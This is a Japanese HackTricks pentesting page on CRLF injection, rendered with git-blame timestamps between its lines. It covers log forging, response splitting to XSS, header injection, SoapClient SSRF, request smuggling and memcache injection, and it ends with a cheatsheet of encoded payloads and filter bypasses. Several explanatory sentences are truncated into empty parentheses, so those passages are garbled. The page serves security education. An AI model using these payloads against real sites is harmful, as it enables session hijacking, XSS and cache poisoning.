2023-07-07 23:42:27 +00:00
# CRLF (%0D%0A) インジェクション
2022-04-28 16:01:33 +00:00
2024-07-19 16:28:25 +00:00
{% hint style="success" %}
AWSハッキングを学び、実践する: < img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > \
GCPハッキングを学び、実践する: < img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > [**HackTricks Training GCP Red Team Expert (GRTE)**< img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > ](https://training.hacktricks.xyz/courses/grte)
2022-04-28 16:01:33 +00:00
2024-07-19 16:28:25 +00:00
< details >
2022-04-28 16:01:33 +00:00
2024-07-19 16:28:25 +00:00
< summary > HackTricksをサポートする< / summary >
2023-12-31 05:23:56 +00:00
2024-07-19 16:28:25 +00:00
* [**サブスクリプションプラン** ](https://github.com/sponsors/carlospolop )を確認してください!
* **💬 [**Discordグループ** ](https://discord.gg/hRep4RUj7f )または[**Telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks\_live** ](https://twitter.com/hacktricks\_live )**をフォローしてください。**
* **ハッキングのトリックを共有するには、[**HackTricks**](https://github.com/carlospolop/hacktricks)および[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。**
2022-04-28 16:01:33 +00:00
< / details >
2024-07-19 16:28:25 +00:00
{% endhint %}
2022-04-28 16:01:33 +00:00
2024-02-18 14:52:15 +00:00
< figure > < img src = "../.gitbook/assets/i3.png" alt = "" > < figcaption > < / figcaption > < / figure >
2022-05-24 00:07:19 +00:00
2024-07-19 16:28:25 +00:00
**バグバウンティのヒント**:
2022-04-28 16:01:33 +00:00
2024-02-18 14:52:15 +00:00
{% embed url="https://go.intigriti.com/hacktricks" %}
2022-05-24 00:07:19 +00:00
2024-02-05 20:22:21 +00:00
### CRLF
2020-07-15 15:43:14 +00:00
2024-07-19 16:28:25 +00:00
キャリッジリターン( ) ( )
2020-07-15 15:43:14 +00:00
2024-07-19 16:28:25 +00:00
### CRLFインジェクション脆弱性
2020-07-15 15:43:14 +00:00
2024-07-19 16:28:25 +00:00
CRLFインジェクションは、ユーザー提供の入力にCRおよびLF文字を挿入することを含みます。このアクションは、サーバー、アプリケーション、またはユーザーを誤解させ、挿入されたシーケンスを1つのレスポンスの終わりと別のレスポンスの開始として解釈させます。これらの文字は本質的に有害ではありませんが、誤用されるとHTTPレスポンスの分割やその他の悪意のある活動につながる可能性があります。
2020-07-15 15:43:14 +00:00
2024-07-19 16:28:25 +00:00
### 例:
2020-07-15 15:43:14 +00:00
2024-07-19 16:28:25 +00:00
[こちらからの例 ](https://www.invicti.com/blog/web-security/crlf-http-header/ )
2020-07-15 15:43:14 +00:00
2024-07-19 16:28:25 +00:00
管理パネルのログファイルが`IP - 時間 - 訪問パス`という形式に従っていると仮定します。典型的なエントリは次のようになります:
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
123.123.123.123 - 08:15 - /index.php?page=home
```
2024-07-19 16:28:25 +00:00
攻撃者はCRLFインジェクションを利用してこのログを操作できます。HTTPリクエストにCRLF文字を注入することで、攻撃者は出力ストリームを変更し、ログエントリを偽造できます。例えば、注入されたシーケンスはログエントリを次のように変えるかもしれません:
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
/index.php?page=home& %0d%0a127.0.0.1 - 08:15 - /index.php?page=home& restrictedaction=edit
```
2024-07-19 16:28:25 +00:00
ここで、`%0d` と `%0a` は CR と LF の URL エンコード形式を表します。攻撃後、ログは誤解を招く形で表示されます:
2023-12-26 02:42:22 +00:00
```
2024-02-05 20:22:21 +00:00
IP - Time - Visited Path
2020-07-15 15:43:14 +00:00
123.123.123.123 - 08:15 - /index.php?page=home&
127.0.0.1 - 08:15 - /index.php?page=home& restrictedaction=edit
```
2024-07-19 16:28:25 +00:00
攻撃者は、ローカルホスト(サーバー環境内で通常信頼されるエンティティ)がアクションを実行したかのように見せかけることで、悪意のある活動を隠蔽します。サーバーは、`%0d%0a`で始まるクエリの部分を単一のパラメータとして解釈し、`restrictedaction`パラメータは別の入力として解析されます。操作されたクエリは、正当な管理コマンドを効果的に模倣します:`/index.php?page=home& restrictedaction=edit`
2024-02-18 14:52:15 +00:00
### HTTPレスポンス分割
2020-07-15 15:43:14 +00:00
2023-07-07 23:42:27 +00:00
#### 説明
2020-07-15 15:43:14 +00:00
2024-07-19 16:28:25 +00:00
HTTPレスポンス分割は、攻撃者がHTTPレスポンスの構造を悪用することで発生するセキュリティ脆弱性です。この構造は、特定の文字列、キャリッジリターン( ) ( ) ( )
2020-07-15 15:43:14 +00:00
2024-07-19 16:28:25 +00:00
#### HTTPレスポンス分割によるXSS
2020-07-15 15:43:14 +00:00
2024-07-19 16:28:25 +00:00
1. アプリケーションは次のようなカスタムヘッダーを設定します:`X-Custom-Header: UserInput`
2. アプリケーションは、クエリパラメータ「user\_input」から`UserInput`の値を取得します。適切な入力検証とエンコーディングが欠如しているシナリオでは、攻撃者はCRLFシーケンスと悪意のあるコンテンツを含むペイロードを作成できます。
3. 攻撃者は特別に作成された'user\_input'を持つURLを作成します: < script > alert ( 'XSS' )</ script > `
* このURLでは、`%0d%0a%0d%0a`はCRLFCRLFのURLエンコード形式です。これにより、サーバーはCRLFシーケンスを挿入し、以降の部分をレスポンスボディとして扱うように仕向けます。
4. サーバーは攻撃者の入力をレスポンスヘッダーに反映させ、悪意のあるスクリプトがレスポンスボディの一部としてブラウザによって解釈される意図しないレスポンス構造を引き起こします。
2020-07-15 15:43:14 +00:00
2024-02-18 14:52:15 +00:00
#### リダイレクトにつながるHTTPレスポンス分割の例
2020-07-15 15:43:14 +00:00
2024-05-05 23:08:22 +00:00
[https://medium.com/bugbountywriteup/bugbounty-exploiting-crlf-injection-can-lands-into-a-nice-bounty-159525a9cb62 ](https://medium.com/bugbountywriteup/bugbounty-exploiting-crlf-injection-can-lands-into-a-nice-bounty-159525a9cb62 )
2020-07-15 15:43:14 +00:00
2024-07-19 16:28:25 +00:00
ブラウザへ:
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
/%0d%0aLocation:%20http://myweb.com
```
2024-07-19 16:28:25 +00:00
サーバーは次のヘッダーで応答します:
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
Location: http://myweb.com
```
2024-07-19 16:28:25 +00:00
**他の例: (から** [**https://www.acunetix.com/websitesecurity/crlf-injection/** ](https://www.acunetix.com/websitesecurity/crlf-injection/ )**)**
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
http://www.example.com/somepage.php?page=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E
```
2024-07-19 16:28:25 +00:00
#### In URL Path
2020-07-15 15:43:14 +00:00
2024-07-19 16:28:25 +00:00
**URLパスの中**にペイロードを送信して、サーバーからの**レスポンス**を制御できます([こちら](https://hackerone.com/reports/192667)の例):
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
http://stagecafrstore.starbucks.com/%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
http://stagecafrstore.starbucks.com/%3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E
```
2024-05-05 23:08:22 +00:00
Check more examples in:
2024-02-05 20:22:21 +00:00
2021-04-17 15:19:39 +00:00
{% embed url="https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/crlf.md" %}
2023-07-07 23:42:27 +00:00
### HTTPヘッダーインジェクション
2021-04-17 15:20:44 +00:00
2024-07-19 16:28:25 +00:00
HTTPヘッダーインジェクションは、CRLF( ) ( ) ( )
2021-04-17 15:20:44 +00:00
2024-02-05 20:22:21 +00:00
#### HTTPヘッダーインジェクションを介したCORSの悪用
2021-04-17 15:20:44 +00:00
2024-07-19 16:28:25 +00:00
攻撃者はHTTPヘッダーを挿入してCORS( )
2021-04-17 15:19:39 +00:00
2024-02-05 20:22:21 +00:00
#### CRLFを介したSSRFおよびHTTPリクエストインジェクション
2021-04-17 15:19:39 +00:00
2024-07-19 16:28:25 +00:00
CRLFインジェクションは、まったく新しいHTTPリクエストを作成して挿入するために利用できます。これの顕著な例は、PHPの`SoapClient`クラスの脆弱性であり、特に`user_agent`パラメータ内にあります。このパラメータを操作することで、攻撃者は追加のヘッダーやボディコンテンツを挿入したり、まったく新しいHTTPリクエストを注入したりすることができます。以下は、この悪用を示すPHPの例です:
2021-04-17 15:19:39 +00:00
```php
2023-07-07 23:42:27 +00:00
$target = 'http://127.0.0.1:9090/test';
2021-04-17 15:19:39 +00:00
$post_string = 'variable=post value';
$crlf = array(
2023-07-07 23:42:27 +00:00
'POST /proxy HTTP/1.1',
'Host: local.host.htb',
'Cookie: PHPSESSID=[PHPSESSID]',
'Content-Type: application/x-www-form-urlencoded',
'Content-Length: '.(string)strlen($post_string),
"\r\n",
$post_string
2021-04-17 15:19:39 +00:00
);
$client = new SoapClient(null,
2023-07-07 23:42:27 +00:00
array(
'uri'=>$target,
'location'=>$target,
'user_agent'=>"IGN\r\n\r\n".join("\r\n",$crlf)
)
2021-04-17 15:19:39 +00:00
);
2024-02-05 20:22:21 +00:00
# Put a netcat listener on port 9090
2021-04-17 15:19:39 +00:00
$client->__soapCall("test", []);
```
2024-07-19 16:28:25 +00:00
### ヘッダーインジェクションによるリクエストスモグリング
2024-02-05 20:22:21 +00:00
2024-07-19 16:28:25 +00:00
この技術と潜在的な問題についての詳細は、[**元のソースを確認してください**](https://portswigger.net/research/making-http-header-injection-critical-via-response-queue-poisoning) 。
2020-07-15 15:43:14 +00:00
2024-07-19 16:28:25 +00:00
初期リクエストに応答した後に**バックエンドが接続を維持する**ことを保証するために、重要なヘッダーをインジェクトできます:
2022-10-05 09:28:25 +00:00
```
GET /%20HTTP/1.1%0d%0aHost:%20redacted.net%0d%0aConnection:%20keep-alive%0d%0a%0d%0a HTTP/1.1
```
2024-07-19 16:28:25 +00:00
その後、2回目のリクエストを指定できます。このシナリオは通常、[HTTP request smuggling](http-request-smuggling/)を含み、これはサーバーがインジェクション後に追加した余分なヘッダーやボディ要素がさまざまなセキュリティの脆弱性につながる技術です。
2024-05-05 23:08:22 +00:00
**悪用:**
2024-02-18 14:52:15 +00:00
2024-07-19 16:28:25 +00:00
1. **悪意のあるプレフィックスインジェクション** : この方法は、悪意のあるプレフィックスを指定することで次のユーザーのリクエストやウェブキャッシュを汚染することを含みます。これの例は次のとおりです:
2022-10-05 09:28:25 +00:00
2024-05-05 23:08:22 +00:00
`GET /%20HTTP/1.1%0d%0aHost:%20redacted.net%0d%0aConnection:%20keep-alive%0d%0a%0d%0aGET%20/redirplz%20HTTP/1.1%0d%0aHost:%20oastify.com%0d%0a%0d%0aContent-Length:%2050%0d%0a%0d%0a HTTP/1.1`
2022-10-05 09:28:25 +00:00
2024-07-19 16:28:25 +00:00
2. **レスポンスキュー汚染のためのプレフィックスの作成** : このアプローチは、トレーリングジャンクと組み合わせることで完全な2回目のリクエストを形成するプレフィックスを作成することを含みます。これによりレスポンスキューの汚染が引き起こされる可能性があります。例は次のとおりです:
2022-10-05 09:28:25 +00:00
`GET /%20HTTP/1.1%0d%0aHost:%20redacted.net%0d%0aConnection:%20keep-alive%0d%0a%0d%0aGET%20/%20HTTP/1.1%0d%0aFoo:%20bar HTTP/1.1`
2024-05-05 23:08:22 +00:00
### Memcacheインジェクション
2023-02-16 13:29:30 +00:00
2024-07-19 16:28:25 +00:00
Memcacheは**クリアテキストプロトコルを使用するキー-バリューストア**です。詳細は次のリンクを参照してください:
2023-02-16 13:29:30 +00:00
{% content-ref url="../network-services-pentesting/11211-memcache/" %}
[11211-memcache ](../network-services-pentesting/11211-memcache/ )
{% endcontent-ref %}
2024-07-19 16:28:25 +00:00
**完全な情報は**[ **元の文書** ](https://www.sonarsource.com/blog/zimbra-mail-stealing-clear-text-credentials-via-memcache-injection/) **をお読みください**
プラットフォームが**HTTPリクエストからデータを取得し、サニタイズせずに**メモリキャッシュサーバーに**リクエスト**を行う場合、攻撃者はこの動作を悪用して**新しいメモリキャッシュコマンドを注入**することができます。
2023-12-26 02:42:22 +00:00
2024-07-19 16:28:25 +00:00
たとえば、元々発見された脆弱性では、キャッシュキーがユーザーが接続すべきIPとポートを返すために使用され、攻撃者は**メモリキャッシュコマンドを注入**して**キャッシュを汚染し、被害者の詳細**(ユーザー名とパスワードを含む)を攻撃者のサーバーに送信することができました:
2023-02-16 13:29:30 +00:00
2024-07-19 16:28:25 +00:00
< figure > < img src = "../.gitbook/assets/image (659).png" alt = "https://assets-eu-01.kc-usercontent.com/d0f02280-9dfb-0116-f970-137d713003b6/ba72cd16-2ca0-447b-aa70-5cde302a0b88/body-578d9f9f-1977-4e34-841c-ad870492328f_10.png?w=1322&h=178&auto=format&fit=crop" > < figcaption > < / figcaption > < / figure >
2023-09-28 20:14:46 +00:00
2024-07-19 16:28:25 +00:00
さらに、研究者たちは、攻撃者のIPとポートを、攻撃者が知らないユーザーのメールに送信するためにメモリキャッシュのレスポンスをデシンクすることができることも発見しました:
2023-09-28 20:14:46 +00:00
2024-07-19 16:28:25 +00:00
< figure > < img src = "../.gitbook/assets/image (637).png" alt = "https://assets-eu-01.kc-usercontent.com/d0f02280-9dfb-0116-f970-137d713003b6/c6c1f3c4-d244-4bd9-93f7-2c88f139acfa/body-3f9ceeb9-3d6b-4867-a23f-e0e50a46a2e9_14.png?w=1322&h=506&auto=format&fit=crop" > < figcaption > < / figcaption > < / figure >
2023-06-06 22:57:49 +00:00
2024-07-19 16:28:25 +00:00
### WebアプリケーションにおけるCRLF / HTTPヘッダーインジェクションを防ぐ方法
2023-02-16 13:29:30 +00:00
2024-07-19 16:28:25 +00:00
WebアプリケーションにおけるCRLF( ) :
2020-07-15 15:43:14 +00:00
2024-07-19 16:28:25 +00:00
1. **レスポンスヘッダーに直接ユーザー入力を避ける** : 最も安全なアプローチは、ユーザーが提供した入力を直接レスポンスヘッダーに組み込まないことです。
2. **特殊文字をエンコードする** : 直接ユーザー入力を避けることができない場合は、CR( ) ( )
3. **プログラミング言語を更新する** : Webアプリケーションで使用されるプログラミング言語を定期的に最新バージョンに更新します。HTTPヘッダーを設定する関数内でCRおよびLF文字の注入を本質的に許可しないバージョンを選択してください。
2020-07-15 15:43:14 +00:00
2024-07-19 16:28:25 +00:00
### CHEATSHEET
[こちらからチートシート ](https://twitter.com/NinadMishra5/status/1650080604174667777 )
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
1. HTTP Response Splitting
2021-06-23 17:08:03 +00:00
• /%0D%0ASet-Cookie:mycookie=myvalue (Check if the response is setting this cookie)
2020-07-15 15:43:14 +00:00
2. CRLF chained with Open Redirect
2023-07-07 23:42:27 +00:00
• //www.google.com/%2F%2E%2E%0D%0AHeader-Test:test2
2020-07-15 15:43:14 +00:00
• /www.google.com/%2E%2E%2F%0D%0AHeader-Test:test2
• /google.com/%2F..%0D%0AHeader-Test:test2
• /%0d%0aLocation:%20http://example.com
3. CRLF Injection to XSS
• /%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23
• /%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
4. Filter Bypass
• %E5%98%8A = %0A = \u560a
• %E5%98%8D = %0D = \u560d
• %E5%98%BE = %3E = \u563e (>)
• %E5%98%BC = %3C = \u563c (< )
• Payload = %E5%98%8A%E5%98%8DSet-Cookie:%20test
```
2023-12-16 14:46:09 +00:00
## 自動ツール
2020-09-11 09:44:53 +00:00
2023-12-16 14:46:09 +00:00
* [https://github.com/Raghavd3v/CRLFsuite ](https://github.com/Raghavd3v/CRLFsuite )
* [https://github.com/dwisiswant0/crlfuzz ](https://github.com/dwisiswant0/crlfuzz )
2020-09-11 09:44:53 +00:00
2024-02-05 20:22:21 +00:00
## ブルートフォース検出リスト
2021-06-27 21:56:13 +00:00
2023-12-16 14:46:09 +00:00
* [https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/crlf.txt ](https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/crlf.txt )
2021-06-27 21:56:13 +00:00
2023-07-07 23:42:27 +00:00
## 参考文献
2024-02-18 14:52:15 +00:00
2024-02-05 20:22:21 +00:00
* [**https://www.invicti.com/blog/web-security/crlf-http-header/** ](https://www.invicti.com/blog/web-security/crlf-http-header/ )
2022-04-05 22:24:52 +00:00
* [**https://www.acunetix.com/websitesecurity/crlf-injection/** ](https://www.acunetix.com/websitesecurity/crlf-injection/ )
2023-02-16 13:29:30 +00:00
* [**https://portswigger.net/research/making-http-header-injection-critical-via-response-queue-poisoning** ](https://portswigger.net/research/making-http-header-injection-critical-via-response-queue-poisoning )
2024-02-05 20:22:21 +00:00
* [**https://www.netsparker.com/blog/web-security/crlf-http-header/** ](https://www.netsparker.com/blog/web-security/crlf-http-header/ )
2022-04-28 16:01:33 +00:00
2024-02-18 14:52:15 +00:00
< figure > < img src = "../.gitbook/assets/i3.png" alt = "" > < figcaption > < / figcaption > < / figure >
2022-05-24 00:07:19 +00:00
2024-07-19 16:28:25 +00:00
**バグバウンティのヒント**: **ハッカーによる、ハッカーのためのプレミアム** **バグバウンティプラットフォーム** **Intigritiに** **サインアップ** **しましょう** !今日、[**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks)に参加して、最大**$100,000**の報酬を得始めましょう!
2022-05-24 00:07:19 +00:00
2024-02-18 14:52:15 +00:00
{% embed url="https://go.intigriti.com/hacktricks" %}
2022-04-28 16:01:33 +00:00
2024-07-19 16:28:25 +00:00
{% hint style="success" %}
AWSハッキングを学び、実践する: < img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > \
GCPハッキングを学び、実践する: < img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > [**HackTricks Training GCP Red Team Expert (GRTE)**< img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > ](https://training.hacktricks.xyz/courses/grte)
2022-04-28 16:01:33 +00:00
2024-07-19 16:28:25 +00:00
< details >
2023-12-31 05:23:56 +00:00
2024-07-19 16:28:25 +00:00
< summary > HackTricksをサポートする< / summary >
2022-04-28 16:01:33 +00:00
2024-07-19 16:28:25 +00:00
* [**サブスクリプションプラン** ](https://github.com/sponsors/carlospolop )を確認してください!
* **💬 [**Discordグループ** ](https://discord.gg/hRep4RUj7f )または[**テレグラムグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks\_live** ](https://twitter.com/hacktricks\_live )**をフォローしてください。**
* **ハッキングのトリックを共有するには、[**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。**
2022-04-28 16:01:33 +00:00
< / details >
2024-07-19 16:28:25 +00:00
{% endhint %}
